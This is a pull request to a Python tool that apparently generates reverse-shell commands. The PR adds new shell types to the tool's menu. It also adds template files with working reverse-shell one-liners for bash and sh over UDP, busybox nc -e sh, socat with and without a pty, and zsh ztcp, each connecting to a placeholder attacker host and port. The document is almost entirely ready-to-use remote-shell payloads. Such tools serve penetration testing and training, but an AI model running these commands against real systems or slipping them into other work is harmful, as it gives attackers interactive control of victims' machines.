### PR TITLE
Added support for more rev shells

### DIFF
--- a/inumaki.py
+++ b/inumaki.py
@@ -29,7 +29,9 @@ acceptedshells = ['POWERSHELL',
                   'LUA',
                   'PHP',
                   'SH',
-                  'NC']
+                  'SOCAT',
+                  'NC',
+                  'ZSH']
 
 
 def clear():
@@ -130,7 +132,9 @@ def gettypeofshell():
     LUA
     PHP
     SH
-    NC''', Style.RESET_ALL)
+    SOCAT
+    NC
+    ZSH''', Style.RESET_ALL)
 
     while True:
         try:

--- a/inumaki.py
+++ b/inumaki.py
@@ -24,6 +24,7 @@ acceptedshells = ['POWERSHELL',
                   'PYTHON3',
                   'PYTHON',
                   'BASH',
+                  'BUSYBOX',
                   'PERL',
                   'RUBY',
                   'LUA',
@@ -127,6 +128,7 @@ def gettypeofshell():
     PYTHON3
     PYTHON
     BASH
+    BUSYBOX
     PERL
     RUBY
     LUA

--- a/src/bash
+++ b/src/bash
@@ -1,3 +1,4 @@
 bash -i >& /dev/tcp/TEMPHOST/TEMPPORT 0>&1
 0<&196;exec 196<>/dev/tcp/TEMPHOST/TEMPPORT; sh <&196 >&196 2>&196
 /bin/bash -l > /dev/tcp/TEMPHOST/TEMPPORT 0<&1 2>&1
+bash -i >& /dev/udp/TEMPHOST/TEMPPORT 0>&1

--- a/src/busybox
+++ b/src/busybox
@@ -1,0 +1,1 @@
+busybox nc TEMPHOST TEMPPORT -e sh

--- a/src/sh
+++ b/src/sh
@@ -1,3 +1,4 @@
 sh -i >& /dev/tcp/TEMPHOST/TEMPPORT 0>&1
 0<&196;exec 196<>/dev/tcp/TEMPHOST/TEMPPORT; sh <&196 >&196 2>&196
 /bin/sh -l > /dev/tcp/TEMPHOST/TEMPPORT 0<&1 2>&1
+sh -i >& /dev/udp/TEMPHOST/TEMPPORT 0>&1

--- a/src/socat
+++ b/src/socat
@@ -1,0 +1,2 @@
+socat TCP:TEMPHOST:TEMPPORT EXEC:sh
+NOTE: pty --> socat TCP:TEMPHOST:TEMPPORT EXEC:'sh',pty,stderr,setsid,sigint,sane

--- a/src/zsh
+++ b/src/zsh
@@ -1,0 +1,1 @@
+zsh -c 'zmodload zsh/net/tcp && ztcp TEMPHOST TEMPPORT && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'


### PR DESCRIPTION
- Great project, thanks alot for making this!
- Added a `udp` `sh` and `bash` revshell
- Added `busybox nc` revshell seen commonly on routing devices....unifi, mikrotik etc etc
- Added `zsh` specific rev shell as `zsh` is increasingly common these day.
- Added `socat` revshells, one that creates a `pty` and a standard non `pty` option
- I am planning on adding some more in the future.